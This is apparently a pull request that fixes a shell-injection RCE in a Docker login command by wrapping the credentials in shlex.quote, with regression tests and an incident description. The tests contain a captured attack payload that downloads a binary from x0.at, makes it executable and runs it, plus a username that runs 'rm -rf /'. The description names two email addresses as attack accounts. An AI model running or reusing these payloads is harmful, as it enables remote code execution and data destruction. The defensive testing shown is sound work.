### PR TITLE
DAH-2009, shlex.quote docker login credentials

### DIFF
--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -242,6 +242,13 @@ class DockerService:
 
         return available_ports, pod_mapping
 
+    @staticmethod
+    def _build_docker_login_command(username: str, password: str) -> str:
+        return (
+            f"echo {shlex.quote(password)} | "
+            f"/usr/bin/docker login --username {shlex.quote(username)} --password-stdin"
+        )
+
     async def execute_and_stream_logs(
         self,
         ssh_client: asyncssh.SSHClientConnection,
@@ -972,7 +979,9 @@ class DockerService:
                 #     log_extra=default_extra,
                 # )
                 if payload.docker_username and payload.docker_password:
-                    command = f"echo '{payload.docker_password}' | /usr/bin/docker login --username '{payload.docker_username}' --password-stdin"
+                    command = self._build_docker_login_command(
+                        payload.docker_username, payload.docker_password
+                    )
                     await self.execute_and_stream_logs(
                         ssh_client=ssh_client,
                         command=command,

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -1,3 +1,4 @@
+import shlex
 from unittest.mock import AsyncMock, Mock, MagicMock
 from uuid import uuid4, UUID
 from datetime import datetime
@@ -918,3 +919,61 @@ async def test_clean_containers_no_volume_cleanup_when_disabled(docker_service, 
     # Assert — only one call for container rm, no volume command
     assert retry_ssh_mock.call_count == 1
     assert "docker rm" in retry_ssh_mock.call_args_list[0][0][1]
+
+
+# DAH-2009: shell-injection RCE via docker_password — verify _build_docker_login_command
+# wraps credentials with shlex.quote so attacker payloads stay literal arguments to echo.
+
+
+def test_build_docker_login_command_neutralizes_attack_payload_in_password():
+    """The 2026-04-27 RCE payload must end up as a single argument to echo, not as injected commands."""
+    # Arrange — exact payload captured in production
+    malicious_password = (
+        "x' | curl https://x0.at/mney -o /tmp/mney"
+        "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
+    )
+
+    # Act
+    command = DockerService._build_docker_login_command("user", malicious_password)
+    tokens = shlex.split(command)
+
+    # Assert — the entire payload is one token after `echo`, so the shell
+    # never reaches `curl`/`chmod`/`/tmp/mney` as commands.
+    assert tokens[0] == "echo"
+    assert tokens[1] == malicious_password
+    assert tokens[2] == "|"
+    assert tokens[3] == "/usr/bin/docker"
+    assert tokens[4] == "login"
+    assert tokens[5] == "--username"
+    assert tokens[6] == "user"
+    assert tokens[7] == "--password-stdin"
+
+
+def test_build_docker_login_command_preserves_legitimate_password_with_metachars():
+    """Strong real-world passwords containing &, $, ', ` must round-trip unchanged."""
+    # Arrange — sample of in-production legitimate passwords
+    legit_passwords = [
+        "cJhMt$8^?jc)n8&",
+        "Grande@Cor#Hube&Pasa307",
+        "dcb&L#%iJh^c@DXHNJommE@94$!Qk!9n",
+        "k!&2Ruz3jnbQ@EcB42bU",
+    ]
+
+    # Act + Assert — each password becomes exactly one shell token to echo.
+    for password in legit_passwords:
+        command = DockerService._build_docker_login_command("user", password)
+        tokens = shlex.split(command)
+        assert tokens[1] == password, f"password mangled: {password!r} → {tokens[1]!r}"
+
+
+def test_build_docker_login_command_quotes_username_too():
+    """docker_username is also injected via f-string — must be quoted."""
+    # Arrange — username carrying shell metacharacters
+    malicious_username = "user'; rm -rf / #"
+
+    # Act
+    command = DockerService._build_docker_login_command(malicious_username, "pw")
+    tokens = shlex.split(command)
+
+    # Assert — the entire username appears as one token after --username.
+    assert tokens[6] == malicious_username


### PR DESCRIPTION
## Describe your changes

Fix shell-injection RCE in `docker_service.py:975` by wrapping `docker_username` and `docker_password` with `shlex.quote()` before they are interpolated into the SSH `docker login` command.

### Problem

Active RCE in production on 2026-04-27 (07:47–08:15 UTC). User submitted a `docker_password` containing shell metacharacters that broke out of the surrounding `echo '...'` and executed `curl … | sh` on the executor:

```python
# before (line 975):
command = f"echo '{payload.docker_password}' | /usr/bin/docker login --username '{payload.docker_username}' --password-stdin"
```

PR #903 (DAH-827) introduced `shlex.quote()` for `container_name` / `container_path` in this same file, but missed the docker-login site.

### Fix

Extract command construction into a small static helper and quote both fields:

```python
@staticmethod
def _build_docker_login_command(username: str, password: str) -> str:
    return (
        f"echo {shlex.quote(password)} | "
        f"/usr/bin/docker login --username {shlex.quote(username)} --password-stdin"
    )
```

After this, **any** password content (including the in-the-wild attack payload, strong passwords with `&`, `'`, `$`, etc.) becomes a single literal shell token. The executor's shell never reaches `curl`/`chmod`/`/tmp/mney` as commands; `docker login` just gets the literal string and returns an auth-failure.

### Why fix at this seam, not at the API boundary

The first attempt in compute-app rejected shell metacharacters in `DockerCredentialUpdateCreateDto`. Auditing prod showed that 5 legitimate users have passwords that legitimately contain `&` (`&`, `#7`, etc.) — a blocklist would lock them out of credential updates. Quoting at the shell seam is the right architectural layer: data stays raw in storage, and only becomes shell-safe at the moment we hand it to a shell.

## Issue ticket number and link

[DAH-2009 — Hotfix: shell injection RCE in docker_service docker login command](https://www.notion.so/Hotfix-shell-injection-RCE-in-docker_service-docker-login-command-34fb8bfdbde98112b20be0ecb64196bb)

## Checklist before requesting a review
- [x] I have performed a self-review of my code
- [x] I wrote tests (`tests/test_docker_service.py` — 3 new tests: attack payload neutralised, legitimate `&`/`$`/`'` passwords preserved, malicious username also quoted)
- [x] Need to take care of performance? — N/A (one extra function call per pod-create on the existing slow SSH path)

### Out-of-scope follow-ups

- Cleanup of 2 active attack rows still sitting in prod `dockercredential` (`hazimpolat164@gmail.com`, `caulkmaune@gmail.com`) — separate operator action.
- Wider audit of remaining f-string SSH commands in `docker_service.py` for defense-in-depth (per `docs/lium-io/security-shell-injection-elimination.md`).